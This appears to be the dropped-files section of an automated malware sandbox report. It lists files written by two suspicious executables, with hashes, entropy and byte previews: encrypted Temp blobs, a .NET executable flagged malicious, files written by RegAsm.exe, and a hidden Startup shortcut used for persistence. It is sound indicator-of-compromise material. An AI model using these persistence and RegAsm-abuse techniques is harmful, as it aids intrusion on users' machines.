SHA1:	1AC31C4E79950111568D4CE73FCEE387B865A415
SHA-256:	2EB51C59B8B67FCB580465AFEBDB7617A83266D8CD0BDDD299C1F2A8C8550ED4
SHA-512:	42B2BAE0A461A623E41DAEE3BECBA768802E879B36B438F4C31B0FB3D7654D0D953E5EDFBC7B56FB61B1620A5FAD606F002D8188ED6360B4709F859618700E2C
Malicious:	false
Reputation:	unknown
Preview:	9..:\|...Xk..a._...>2.?....w.e....kq..'#...MX9..[!..I..r ...........}..b8I.E....<u.....S....JE;.x..).../.pc.F..u..fd...:KWI...\.b....^..N.R..4!.....X...u..z.Q.$17 ...Z.....Z..8$H.rY1..E[...K].a.f...:....;..(....\|D.O..q....+~.t.-.Wx...\.......MT.+..r....7......#..?.\|j.A9.m......\^....W..c..x...=.....y...O...[.T.....e..D...4........=.?.....j..U.k..H..q......sl.I.0w&<..1z.G..7..g^...u.d...%.4D........5...&.............R.$4.(......Gsh...1O`....v.pp...1u."S.O.O../.......A.Kv..a.d....2i1B!=O....O....yze..........J..]....i..'c...!...ay...h>9F..SD.o..<..f....sj..d...l....<...........n.....2...Kx.qVD/.^y_n~.-\...b....u.~.B.8).9....&.H.t.......c.S...c.v=4../....TlD.).5.ze.Z.R...ym.h..C.)....r.~.7.i8..(c..Y./.......4..^.......c..Rf=0.;..........x.n...m..;......O.m.X.:...th7A.U.............Y..i.I.Z.sa.....B$==...I.L?...XmE.E..%...A.!9S....IY.x.N......gEo"../.......&.F.d.b.U.`....e.n....$]......6.g.....%M...[kU...M/#N..E.y...~....B.bS.c.Oi.Km.

C:\Users\user\AppData\Local\Temp\Itsa

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	96256
Entropy (8bit):	7.998241028505028
Encrypted:	true
SSDEEP:	1536:YR/Kb3/4fPDukRQqss0jTjabr3c0tz1zQnqnljI7/C+RsVJN:YpKb3CPDRH0X2c2z1sEljgHRiN
MD5:	051A14F480A1E08F6AEA9BCB691D5E50
SHA1:	808A2F6925953C3FE9C9C4D76596C958EBDBB6C8
SHA-256:	938FFC79927FB9634D508BD78CA49B5B45B733F7912034E0E2CEF287EC3D3F91
SHA-512:	60476A137AC2C6BD7F3D130BE063FF498B965E23F4CF497AF64C048F14CF3D199FB997923C92E8A7B5A0516F65FC0E64C5AC149B092068FBDBF45983825EF028
Malicious:	false
Reputation:	unknown
Preview:	..;.3+.H.e...k.J5......Q\.j}.._r.....+.[..U.[..\|.i..M..cf..g..9..X:..Fmj...f.0\|G.....C.A.@..j....._.......o"...d{....v'....@.O.Y.R.K...R.......<u.[.J.T..SU.O.....w.8.. v..A...;Bj..k..V.D.8...../n]T>.b....O.Q.Mw.....7.G..~+.."K,Y\:.jY\|......:.lM.....=.1....".%...q>..!W'...x~...F....1r%....-w...m~/\|..y....l.......X...g.......C....6....#..st....Q...~z-...h.9....O.R.a...~.2~...8S.A...nYe..].....qX.....f...g... .z..[k....=........z.2.(..ZG..w..X..d.w.N.&dK...O...$..?.>..6.2Z.E2.......Y....F.j.C6Aj ..Y2E...N..s.g.r.Bv..X..F.X.6<.s.K+..E...^...6qF...l.M...{.J..)..JmC.p.XOc.~..L8.....$.MA...2....c.....h .Fs.}.....k!!.h....Q.h?#.\|...o.....5..#.....c...8.1dX.P/m.q..u.k)...@.....'.0w(...2..%.L//7.?.!.%....Z\|...O.HJP.o....a..=.^.p....@.....cpK...:.O].q...?}.uN.c...9.....A].@M....H...'.\|aPX..1\|a....s....."r.V.>..H.....k.{Z...6L..z...i..u..lX6..w..=.%...r.....CyV.=.DBX..).z:.'.X\|.K.....}.GW..4.].R..;`...e........:r.J.....~.<y

C:\Users\user\AppData\Local\Temp\Major

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	7.996730708374123
Encrypted:	true
SSDEEP:	1536:bclpmUaL6xdFnZl6bASiRRoDWiSMCJK4C:bc7XxdN60SiReDWimK4C
MD5:	5CC9B184C9B717F867107896B1E1031B
SHA1:	42896A978E3D0E31FBA322FC4EA6739A1E45D7C7
SHA-256:	B1DF5573EC0B1270A3907B03451A621B697DF2CC059F488394FD212DB4E8F302
SHA-512:	8A669C0AF35695996DB742D928CE7ED6496FBCD7A69301A550300504FAD2F9AFF63025E777D18EBC65AD5CA59E045B60E6C4FC6B47170482096137F9B4790004
Malicious:	false
Reputation:	unknown
Preview:	PxcB.k.A..sL....y.T..B.....t...x.xD-i=w@+/<.....X...<...n<....(.._....~Qn....)..p..n.$@.v(.U.8J....`.%.8.U...0=.....P[.V........<"...Z.@.DB..-..aH..mSA.........i.z.M.........V8@..3I..<............-.K.r.2...9[.-o....&.X.._.....z....K....$X..v[....Kgv.l...C....MK......n...,72.I..y%...X.........d...b1G..2..$ZLO.....r./.....#.o.k..W<...fO.&......B..............ADZ._..q.......q.OV.g.`....z...J/^..j...7J....ER...W.8...1..B.=E...7.......i.3...R.U#>...;.......(....4....3.....1...`......Y..Z...YS....@.[{.hnU7;9.V....s...W...h,"'W....9..u<.~..D....$...Mb...+-..F....~>a...F.`../.D........j....J......B.......g..I....u.....\|.GN........jM4.6.1..n8....'.p.3.........t]...r-...i..^.....@DJw.:l4.DM.^..&O2gh....JKX.....8.c=?...../tI...p.O(.p.Sy`[..8...;........t.2.#....FR..kl...H.Z..{L..n.1$uyz.......?K..h,.%.....x.'f...x..$^....>.....y.l.h........c..i......~e._,..f....[..X.F..2...=..cERio.h..S<j.i...1..d...c..J_m.O..~..O+......b.../.h. .,

C:\Users\user\AppData\Local\Temp\Pace

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.996869927238925
Encrypted:	true
SSDEEP:	1536:pyI9tWuhCUDNjB4rzfaBugOn7YEewgQk7LHWumwMP:f9tWICUBgyFOjewNkXHWXw2
MD5:	0AA998EBFAD36EB40EE5C8F673FDBAA8
SHA1:	D5CE174DFF8AE5A0EC25D9ACE0E9FF5C7284990C
SHA-256:	2B2A31AAFD7647C11BBE50FE3C23D9BE3412639DDEC00764764EB3F34B63CB8E
SHA-512:	1D460EB5500A82E0FD65E8E6EAAAAFD73C3E86E0663EA93204FE8B6E8D84E4E998A6865683B52EFEA4339DBBB72D726971765835BED295A6C4EFB8DF7E1DB29D
Malicious:	false
Reputation:	unknown
Preview:	.^....?...U......n.p...!.m,K..W..y.K.......R.U...2.L(F....Z..h.....F.Rb.@Q..x.Qo+.Z.....S...Z....bX..........aT....T].Tt4n.......y$D...8..$...n...YG.k\X.[I..=..RL0.l.U..u...(....]......X..5.....=<y.c..9.M.". ...L.."...G..K...+...W.X...yL........1...o..AS...4....}...2...(........su..&[.'j.v.s.,....y\6#T..c@._...F5i..n..@Z.#s.....o;o..X.....c`....6....J....r..I..#.......9^.*b........z..y..e...<&..V.o.Hi...\|......K..[.......Le.;.. d......k..3......R...i.kJgJl.@..(h.....x."..s.9..-]-....".w.....W..z.4.w;9.aT.........SY...3c..fK.R..._.......`..."..$./C....[a.._p.R(....9.T9=.X.^.......D.9..H...4...a.v..3`.d..)u..'.oQ...&....I/.#.A.n.I....n..m..(...`.r..hT'.n.... ..=b......5sR H.].....SQ.}.8...... ..b.q..0.3...%.....#...08...P...@...o...O.....0.\|.u.}..80,N............E;..x....3.C...BO7..z....,.....].B..B.r!.,O...".Dm`.9.1....m.\|N.."..[.w?..nL.....e...$....G.........`..\|.2..G...... .!].d].G.L<..fz\|<.$..p.$.,Z...6.0......ys.s.... f%.-...m+8.

C:\Users\user\AppData\Local\Temp\Po

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	95232
Entropy (8bit):	7.998237730645119
Encrypted:	true
SSDEEP:	1536:nle7Ngi86Zoyj1DXrx8nuLXAd51ZpnPQaLyymp4X+dlSc4khyrCOig86DWUIP9OC:n4i6Jj1Lrx8eA3jJPnLsp4X03PhIfZqT
MD5:	02AEE454C53AE3C3D86649C2BD57C944
SHA1:	68A4CA87CA6429393EA4514958C799043C0F949A
SHA-256:	69BB3D3305F02FC996E13B741EFEA86D0F9B3F55789D9ADCEFD289CB52BB8D1A
SHA-512:	1BA108D5C9AEA52C1647CBC33E75957455B235DF4F871D7F3557F128827AD73BCE54905B3A79AD0FC97367281BF4D42C7A8319DFA49744411C6B3759D11B5A65
Malicious:	false
Reputation:	unknown
Preview:	E...iJ.l`.0...,.k....GE=....0,.D2....9...WI.[O.d..W....>.`d..?..n....O~G[WJ..t.l...t......ud.....V..?..B.w.Qc.!..#c..Y.$2u=.;.B4"...p....t.h....sgn..Q......z.E...j..]].zn..P.8q.5....f...k.on..=.c.v@./WC..]0\H..Np.Q...#I.t..t.....]6.m.....m...o.....)U...8.\...`$.z..@,h_7h5..$..$....kK<'..?........!&YV..".F.t.(.G.[..>c..4..<..}.b..!.<%.>...uox........k.ij......z......;9......... ..5.AI.H1h).^.@Oxv...l.S..P9l....%i/'.O..ko._.}+..fh.HA.>.P......rG.....@...yw...[..f.X~...w...E.b..i?Q...W....o. SoU2G...W...Z.BA...d.)M...c.y....=.H...Z.I...!.1c....(.Q.vt.....0.Z..i.s......3Vu...jU..}z..{...S..H.Y:,..U..K#..e.9J+..0...v..S..........+...f&BJ...y..TJ.p.d\|..............b.@F...i.....1..Ej..w/..S.<..M.1{L.B .T....!.QN../..Z.N.....MUs..K....*.>..tX;d...T.GB...@..zuL.\..`...;..G.H.x4]l'Vs.N....P..0....o+....#.=.h...\.......n.h#%.m...~]F.R.W..y..]S.T..Z.^.......+Qhq..v@....F..K....i..@....h...r...`.(JVh.k"v.BO..t..H..V............$..?_..<....I.@...

C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe

Download File

Process:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8684256
Entropy (8bit):	7.036585407539768
Encrypted:	false
SSDEEP:	98304:yvOB51QmIWth3e1PTbEYBkQyShbkqdwOyAuYJvdVuWFY:y+51/Iqh3e1PTbE7QbCqeYbM8
MD5:	B5887A19FE50BFA32B524AAAD0A453BC
SHA1:	CD1F3905959CD596C83730A5B03CEEF4E9F2A877
SHA-256:	FCE5CBEEC1EB5274FC3AFA55E57FB2F724688CB9D4661A8A86716011493564C7
SHA-512:	5B9914C94101B53314B14335E687552E5DA0A4085AFB826AE94F45769E9B1E66A35624B6E6B60257514F4ADF2ACC5C9E048BFA3A24AAFB891D203E3011C02538
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....P..............................&... ...@....@.. ....................... ......I.....@..................................&..K....`.............................6&............................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc.......`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Proved

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	7.9970084949530875
Encrypted:	true
SSDEEP:	768:Vgzxu9vulHAMJK9MyelkaXl+YS3kkrB8ELMASboZI4l:VgFavulHTJK0kaXl+b3kkrmnzboZL
MD5:	AD1F2663AA0D3FF8A364CD9191875D6D
SHA1:	BE0BF7F7DADA4EA98FDB1C79FDDF85B41E09B8C9
SHA-256:	E6BFD3F87F7E209F00AB50107971872B5E10DE6A8B0B2B71F49445460252F2AC
SHA-512:	0D5A57287A16F34D9559BDC8A4E005C1432AC73918EFB5FF32F8EC960F00549764EE63E0A5B62112787E01EFBA05E6F125C1336998CF5DF8372E3D157919011C
Malicious:	false
Reputation:	unknown
Preview:	...h..?[..A..O.......P75...,....V0.5....nL.I1+x.5...Z..^..'g.C....T....A$.].M.OM...+.....'..!8..I{........5.2...N.......\.....U..6...v..6vb.y?.V&.%R.X..Q..$...; .Lu...o...#.7....Z.c.....a...&qF......R.....i..=.F.;.)....#s..I.IJ^...["..y..rI....u./..kT.Vd.aJ.%...4'...s_B..\|..!(....'...u!...9..........`....^..r..U..U)..9.~..4z..fo..V..B.9.s/.X..'d.......... ....L...,.. .......q_4[.c...xa.......]4Z9..,...9baI.r..u.[...V..=+......Q....o.F,.2M..1.!..\|...G..:.:`..~A...J'6.!} ..Z7.y..zg.H..p0....e.;..G..n......3`.....T.....].\|..@..q.\|.s.V.....=\|}.G....&..'. .4.....J.e....)@...C.."rs..@......_u.5..QR-v.^...P.MS...a%..@./J..]y..}...o...^..../<P.t...[.)..=....M!d.o.....3..c.J0\..<..Ps^-..ov.\|P.^......3.....'.....D....~.........u.s.#$N.G.J{...n..l..e..]...<z.m4.....,.......&.%.I.i.yxt.......\s.......#W1W....k.7.T.;..g....Y....a.......^.Ssi...'!.l..N..\L..o....Trx(/...0P.~.XVP...U.>......^..r....\.B.^..5...73...S..#"....D3....H.xa ....Y.y....9....

C:\Users\user\AppData\Local\Temp\Reaches

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	7.997673417119786
Encrypted:	true
SSDEEP:	1536:chtEZiqtM9Wf5sEgEaZk1NgvH1dSvmecCQsoPKYp4Jk56aYnh5yyBMxK:0tEZxtDB1N2zSvUCQsUoalYnjykMo
MD5:	443509B8EBC7249E01552436F8D7FB2C
SHA1:	12890B0CA0B1CEC196075BA820F88A7CB75250B2
SHA-256:	EC09B4BF30A7061383164AFCC2C4AA41723E2F1644637E75736501046DAD7248
SHA-512:	448E81CB11AC47F9B5B3589C7C392540B1591FA3209A80E1E1EAC8027EFEBE250B9904AE43678B63CE7D2F2E68B4702A971B7CD8DFCC96813C7FF4CFDFE1BDC7
Malicious:	false
Reputation:	unknown
Preview:	.r.4f.......w.5.E........J..Y..u\|..Z7..t.i.^..U\|..:......?W.!.#>.N..4r...;Q..B^d..Ow.A.fq..}.L{........q..c.zm6.\|5...XJ......X......-u.Z)..x...I.lh:....9.We.....>....K......?.!r.....\.e.>..m..lw.nSHXQtQ.....Uh....j{......)d..~..nJT\|......?..>P....A.Q......".)QL......0.....r.....N.a.x.\|/oe.O.].(^K7S-...x.h]JqAHT.L...'.\|uY.N.if....n...5..]...Y"....V.....v...S.."C...5....xm.....s;..\G.Y.h.DJ..a..qP..`.<_d.....\i.X.......}.,....:t...aSMjmM......N..__).f.)Hl.F:....FX.x35..[.!.>.....DW............u.8..z.4)P6..:Y..8.....J......;.......F.....r...Vx.mub....)....E....D.....es@.Ept.k...fh.N..4#a..V.8.Fy{m.X9C...z_.I.x....6.:.....6U...m..F?.\|.\|....T.....DT(.<6.Sj..N3....t^A.g.y..`...S5.Z...B.y..z./.N.m..W.....\..lBQ:Q..po.....t..C.iX.A....!.a.!B.C..b,.V.c............\|.Hn.@M...Ig...............Ul......0...7m..........e_`......%....hG.G\.H.t...H[..au.\....y..1D...._.]..2...k.*8./(u.......'.....p...,..5.0^...h..$.....-.X.V.:.....?..(.3...W.T.8

C:\Users\user\AppData\Local\Temp\Resolutions

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.998295408953701
Encrypted:	true
SSDEEP:	1536:iG8bCutB1QikuJVfowgwRooCn8TxvHZzwDETac+hnaEED7ks8X2rKRl97KFITW9t:V8bfBesVA+NTxvHZzwDcz/x8X2ORlQI+
MD5:	2AF79301BB06FFB2A9B172002FA10322
SHA1:	7F8F6D93A596D52B268FF485C1CDBBC8C11716CA
SHA-256:	6D60F1E883B792EA433A38563D081360067BD1C224A30DBE33751FC2A57BC68B
SHA-512:	0918AFDA33D5C1081E263F8A1D1DA53D525F189533414ADBD32749B2AAD91EC4D6B134EE3574A1D20ADFD93D05A2AC2DBB3C3AB21A5FB7729E5C44BC4BED0A9F
Malicious:	false
Reputation:	unknown
Preview:	..9.n~.2.=-dB...Y.....}..0.{..o...;.cXD$....0g.Y..a..g.v.O1..Q......O.`....&.-N.iK..6`.d..0."Bg.8.....mm..}.4....bS~....Q.O1..........#c...c........s,c......~.b..J..k`(p.]............Kv...v3.we.l.x...xy.N.....F.V}..Z.\..w0.B....2.g....jl..z+..`...2f...7..{..`..M..F..xj..f.{58...lC5....@.>...j.3ms.v>..5.#.sU.f..Y6..i.e,..u...1........B..(..r.<D....Og..ymJ.{....aIh...<............X.p.._..Q........I4.?....#]...[...kl."....}....vRV<B.5...,-...@.;...,u.Y,+:.ic....\|$...1?....k.^......A.E...\|7...2.......pg..PQO..9.I...+...H...q-0.E....n~..B...(....{..E...bn.4%]8Y...u.1.~......M..n.#.'Y.-Rzs.}.g...[4.g-S.c..........:}.\.....\|..MQ...[9^S.....GnN..}...H..T....0M.g:....,7_}...K........T...JP..O..8).S.<..9..`..P9C...M......D.R<.<...cw..P..)........r.I<..Aqm.^.9.v.hw]..;....._F..<./....{KD5.d0h......uj.9..Y.YBCG..I../Z,<..A..p.....y.`...D....8t..w.....e...."...`p........8" ..h..._31 .h..W?...7.Y..{... ..;r>....Xp...Z/.$u..B...7Li!u..p.5..*.

C:\Users\user\AppData\Local\Temp\Shares

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997462243790629
Encrypted:	true
SSDEEP:	1536:dd1ne0DCWfJ8TasYxSM3BzjZbIDYNZmiEgLAUAs/45vwi:4RgqasLM3ZlcDcX91Q5vwi
MD5:	817C1E7AD55BC045B23A7FB2A61AA33D
SHA1:	BB7A5BC2F6AD5AA3DB6E7800C31E5556B3F419EB
SHA-256:	A053FD49CAEA2142A9A7B6A49F84E0A8A999B828FB4283D3065AC6E73823EC99
SHA-512:	97E559A2A118758688E0C228EEB598F6A57C6B75E7688C43F0C534DAAE18CEC9FDFF036651B3BABCF169C4BA74CDACA7052B125D2E480FBD471E83FA80BA57CA
Malicious:	false
Reputation:	unknown
Preview:	9...j$.&..........W.S..j?RL..q.".......]U^..cz.]k?...8;+...L.9\|..o..-....f.[.YzJy...9I.j....>...D/J9.E..........B.1c]...h..hf.z..r{;s...@.u\|.E.5dN..K!..b.!.QN6)....p .XG..9....h.D;O..mA].....Z...F..bM.)....9..FRJw.-..\.................3.uP..me.....X.Y..@.I.v.i=........W.2z..%..r..........H..G..n]T.......IX..r.E..u<,....P...>.h[o.5..0.M."c.~2y.C.{.I.......=.I..H......I..Vqb].&{H.......acQ>K.F...9.#..@..:{..v.cS..Y.f...-.cZ...F.ZAK...dF`yd..1...j..K....c.~qI.^.M....].L.3.d.C=....$%.j...L......!..U.......q.~..<k.#N.v:u......X..c$.\|!..3.7.?.........&.~e...p.5..$...R`wL>..X.^7.!z..m........&.GY.[E..$.....a..zB.rlV...=............A;........:.E.8....dH.6.Dm.....^U..D@...d.`.H...e.B.fOx..R.4.e....%\|..-b.....`.........s^...6.M.p..J.....w........YL..,..h..Z..b...q_..#...X;T.K$.T.D.........;.c ......d.J.(1..1..."..[.. .qXN.....z.dY...=?;..S;..&.......trbZ{{/..m...l...Ci..8.).2z...'..ee8.&y....F.&..@5...p%...d....../..$.V.A...shP..b".e..Y.....$.B..

C:\Users\user\AppData\Local\Temp\Tmp142.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpFE44.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Reputation:	unknown
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\Write

Download File

Process:	C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.998241581573632
Encrypted:	true
SSDEEP:	3072:nQk13wFml0cbtY1tePjS8mYkPS7sDN+Z7N:nQ0lTbQtePujYgjNm7N
MD5:	AB810C64C650A6C031BFE9FDF2B9CC2E
SHA1:	B25E8FF044BA006F9A448198ABD52BF9D18C97D9
SHA-256:	F6C3EE3CC5C783A7EA177A3E6FD40FE80CBA6FE0BEBC648C10D17B6CDE369129
SHA-512:	FBEC8ADD7B367ED488F8A7727FA5099899BCBB1A15010A1517005DE2EBF483AC9079B54A707A06BAE91068F506917E6751CE27DF21F191C56B7693DB28708B6F
Malicious:	false
Reputation:	unknown
Preview:	...V.5.t.../N........t$7V.......z....S.B............aQ..n.4.h.B.......&..5.../.h..@..=O^.D..2..k.L.....yYk.C.".]....0.`.....z.#;.'..9Y~.U~..g8.j.>..A......q...k.....5.!;].G./..;..4]..Q.....(..,;:..PI.U.n..L.b.;p...Q.U..o..>..%Y..Rj....#..uO..ES(L...x. h...........[V.....#........J...2....'.R..@..f.0.....Wf..O.f-..NN..F!.x.L.....{JS4...P..r..63..t...M8...y..3&....e.........GmQX....~..+J....+.oWD{;s.e,..[.i..c.I.ybu.U.%LR.l&A...=..tq...w.".zQ...Uh...f...0..Vp....L.].$...S.,K..)G{...g..Q.Ix..Y...2J...S....'.l.....F.`!..5.&.z....}.{_ ..kh1j.@V_..B.]I]....-..p.x.j.:.Q.>....,..@......I:....b..oHp..CK.>..f....K....^.._nJi....&...@~......5..S...I.BL.P...Wm\|5..i.LhJ.M....O..+.90...xwI.&.C.2.m.5.8n.!.....q.N.J..Q.f#J..........V...9....@._.......?PRV...@.....5_...'.i\`...q..G+.1.....AH...I..>.m...W..]F{-l..;.....oWZ..W.C#.T_...!.6..6ShK$.{x8..).b..ud.h..9.KO...=#.!.}.Q.`.$\|i..k.M..Ye......q+.%.a.KA1[....(.Y[.......z..9..a.W...Y.a...q..G...qWQ.`...

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:RGRGe:aZ
MD5:	185DC69D7858F155118FE630672BD132
SHA1:	A794F3401B7CA0B9FD7EE27E16F0FAC718B95ADD
SHA-256:	A6B6EB2188F24481091C1C0BBB069EACBF917559CFB0BDB67AB4ECC783559CC8
SHA-512:	8C7C19FC58C88EF5A9916AF8194FCF5E397CC674560D5F776E892D33BBE3EF7248B58FF3BB8ACF607EC0D45114B3C4349C2B5549C78F0A200F806F496A60DAF5
Malicious:	false
Reputation:	unknown
Preview:	########################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################

C:\Users\user\AppData\Local\Temp\twekgmwoe\slrmrjyhe

Download File

Process:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
File Type:	data
Category:	dropped
Size (bytes):	75
Entropy (8bit):	4.718706944280128
Encrypted:	false
SSDEEP:	3:7OoQGlhWhUbvYoQGlzVmo/mn:rQoAUBQoZnm
MD5:	B0C174F453F808E2943EFC37A1C80FEC
SHA1:	9EB18F03D468E0E6B2C4C9F1DC0B5C55C99F36A2
SHA-256:	32BF126E497AA862EF74AAE035E226A6A1229C707BDEF4FC8A5B33798D3660F4
SHA-512:	011F746772FEE18BAFFD473809ECA78F06457B8979E423DD9C633CCAFF704CDE2A84F95421C31F6C18A5819C3FD5368A2A3BF86057C371A761C2DF9B6FF035A4
Malicious:	false
Reputation:	unknown
Preview:	.sYYYY[....5.......0)[CY[AWMOWHKJWJJ[.sYYYY[....5.......-...[CYHNKLMOMKLAs.

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

Download File

Process:	C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Wed Sep 4 14:37:34 2024, mtime=Wed Sep 4 14:37:34 2024, atime=Wed Sep 4 14:37:15 2024, length=8684256, window=hide
Category:	dropped
Size (bytes):	1253
Entropy (8bit):	4.914857743310815
Encrypted:	false
SSDEEP:	24:8am8uSDH+lX9FX3KRlgKUgyxKn4iT9LmUAeanmti4Hesm3qygm:8MlDH+lNFnKRzyxKFT9WbnCyg
MD5:	63CDA58A1BA1F649F62C130C6E321EBF
